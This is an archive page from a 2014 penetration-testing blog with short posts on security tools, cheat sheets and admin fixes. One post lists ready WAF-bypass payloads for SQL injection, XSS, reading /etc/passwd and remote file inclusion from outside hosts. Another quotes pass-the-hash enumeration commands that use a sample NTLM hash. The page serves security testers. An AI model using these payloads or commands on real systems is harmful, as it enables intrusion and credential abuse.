Aug 2, 2014

Tools: "Flashbang" - Analysis Flash Script

This tool is an open-source Flash-security helper with a very specific purpose: Find the flashVars of a naked SWF and display them, so a security tester can start hacking away without decompiling the code.
Flashbang is built upon Mozilla's Shumway project. It runs in the browser but has a bunch of requirements to work properly. See the links below.

Source: https://github.com/cure53/Flashbang


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: Packet flows in netfilter

Packet flows in netfilter #linux #netfilter #kernel #networking pic.twitter.com/5uXQ6eqmyA

 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Cheatsheet: Executable and Link Format

Executable and Link Format


https://twitter.com/angealbertini/status/495240082563928066/photo/1


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Fix /var/lib/nginx/fastcgi/*" failed (13: Permission denied) while reading upstream

When you use LEMP and you want to change owner of /var/www/ to another account. So, you should change your nginx owner process in /etc/nginx/nginx.conf(user option). But it still have the permission problem about the lib of /var/lib/nginx/{}. 

And the log will says something like /var/lib/nginx/fastcgi/3/01/0000000013" failed (13: Permission denied) while reading upstream.

Now you must change your lib owner to match the /var/www such as if your owner of /var/www/ is webmaster, you must change owner of /var/lib/nginx/fastcgi too.

1. chown -R webmaster:webmaster /var/lib/nginx/

2. Restart Nginx

Done.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Aug 1, 2014

Tools: iRET - iOS Reverse Engineering Tool

The iOS Reverse Engineering Toolkit is a toolkit designed to automate many of the common tasks associated with iOS penetration testing. It automates a many common tasks including:
  • binary analysis using otool
  • keychain analysis using keychain_dumper
  • reading database content using sqlite
  • reading log and plist files
  • binary decryption using dumpdecrypted
  • dumping binary headers using class_dump_z
  • creating, editing, installing theos tweaks
Source: https://github.com/S3Jensen/iRET



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 31, 2014

Howto: bypass Incapsula and ModSecurity List

SQLi
-  /poc.php?Search2=joxy%27%20group%20by%20testzsl%20having%201=1--

XSS
-  /poc.php?x=%3C/h2%3E%3Cinput%20onfocus=prompt%28%27ZSL%27%29;%20autofocus%3E
-   /poc.php?x=%3C/h2%3E%3Cbody%20oninput=alert%281%29%3E%3Cinput%20autofocus%3E

-   /poc.php?x=%3C/h2%3E%3Cobject%20data=%22data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%22%3E%3C/object%3E

LFI/RFI
-  /poc.php?cmd2=http://google.com?
-  /poc.php?cmd2=cat%20\/etc/\/passwd
-  /poc.php?cmd2=http://dni.destr0y.net/x.txt
-  /poc.php?cmd2=http://96.8.122.139/x.php?????????


Source: http://www.intelligentexploit.com/articles/CloudFlare-vs-Incapsula-vs-ModSecurity.pdf

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Fix "Error code: sec_error_untrusted_issuer" in Firefox

When I test some HTTPS website with BurpSuite + Firefox . I got "(Error code: sec_error_untrusted_issuer)" and I can't go any page of a target website. So I must add exception this certificate to my Firefox. This is how to do that.
1. Go to your Preference.

2. Go to Advance Tab -> Certificates

3. View Certificates

 4. Click Add Exception
5. Fill your target website

6. Get Certificate -> Confirm Security Exception

7.  OK

8. Try visit the website again.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 30, 2014

Pass-the-Hash is Dead: Long Live Pass-the-Hash

Source: http://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/  

“Administrators” are no longer able to execute code with WMI or PSEXEC, use schtasks or at, or even browse the open shares on the target machine. the RID 500 built-in Administrator account, even if it’s renamed. While Windows 7 installs will now disable this account by default and prompt for a user to set up another local administrator, many organizations used to standard advice and compliance still have loads of RID 500 accounts, enabled, all over their enterprise.


 However, when you try to use PSEXEC or WMIS to trigger agents or commands, or use Impacket’s functionality to browse the file shares, you’ll encounter something like this:

 The “pth-winexe” example above shows the difference between invalid credentials (NT_STATUS_LOGON_FAILURE) and the new patch behavior. If you happen to have the plaintext, through group policy preferences, some Mimikatz luck, or cracking the dumped NTLM hashes, you can still RDP to a target successfully with something like rdesktop -u mike -p password 192.168.52.151.

If we have Powershell access on a Windows domain machine, you can try enumerating all the local groups on a target machine with something like:
  • $computer = [ADSI]“WinNT://WINDOWS2,computer”
  • $computer.psbase.children | where { $_.psbase.schemaClassName -eq ‘group’ } | foreach { ($_.name)[0]}
If we want the members of a specific group, that’s not hard either:
  • $members = @($([ADSI]“WinNT://WINDOWS2/Administrators”).psbase.Invoke(“Members”))
  • $members | foreach { $_.GetType().InvokeMember(“ADspath”, ‘GetProperty’, $null, $_, $null) }
the Nmap scripts smb-enum-groups.nse and smb-enum-users.nse can accomplish the same thing using a valid account for the machine (even a member of local admins!) along a password or hash:
  • nmap -p U:137,T:139 –script-args ‘smbuser=mike,smbhash=8846f7eaee8fb117ad06bdd830b7586c’ –script=smb-enum-groups –script=smb-enum-users 192.168.52.151
If you want to use a domain account, set your flags to something like –script-args ‘smbdomain=DOMAIN,smbuser=USER,smbpass/smbhash=X’. You’ll be able to enumerate the RID 500 account name and whether it’s disabled, as well as all the members of the local Administrators group on the machine. If there’s a returned member of the Administrator group that doesn’t show up in the smb-enum-users list, like ‘Jason’ in this instance, it’s likely a domain account.  This information can give you a better idea of what credentials will work where, and what systems/accounts you need to target.




 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Video: Hack in Paris 2014

Link: https://www.youtube.com/playlist?list=PL3UAg9Zuj1yLmemIKw-domjg5UkbN-pLc


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Wlister - Web application firewall designed to whitelist and/or blacklist HTTP requests.

wlister is a web application firewall (WAF) allowing web application protection based on whitelisting and attacks signature. The former is used to quickly validating an authorized and well formed request. The latter is used to detect known attacks patterns into HTTP requests.
Using wlister it is possible to apply both methods and to combine them at will.
wlister allows to describe interactions between the web application and the client, using each piece of a HTTP request and their combination as a potential validation point (URI, parameters, headers, content, method, protocol, ...).

Source:  https://github.com/etombini/wlister


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Video: Recon 2014

Link :: http://recon.cx/2014/video/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: SQL Join



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 29, 2014

Tools: WAPMap - Convert .netxml files output by Kismet to Google Map Engine


Usage: ./wap_mapper.py <Kismet.netxml File> <Mode> <Output File Name>
Example: ./wap_mapper.py /root/Kismet-20140725-22-33-53-1.netxml -wep wep_networks.csv
Example will parse the provided .netxml file and output a csv file of WEP networks for upload to Google Maps Engine

Source:
http://www.shortbus.ninja/wardriving-with-kismet-and-wapmap/
https://github.com/hack1thu7ch/WAPMap

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: SQLMap from Packetstorm



Source: http://packetstorm.foofus.com/papers/cheatsheets/sqlmap-cheatsheet-1.0-SDB.pdf


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 28, 2014

Article: บทวิเคราะห์ Instagram(เมื่อปี 2012)

Link:: https://db.tt/RJgoVhEJ

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 27, 2014

News: Syscan360 Conference Slides has available for download.

http://www.syscan360.org/en/schedule.html




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.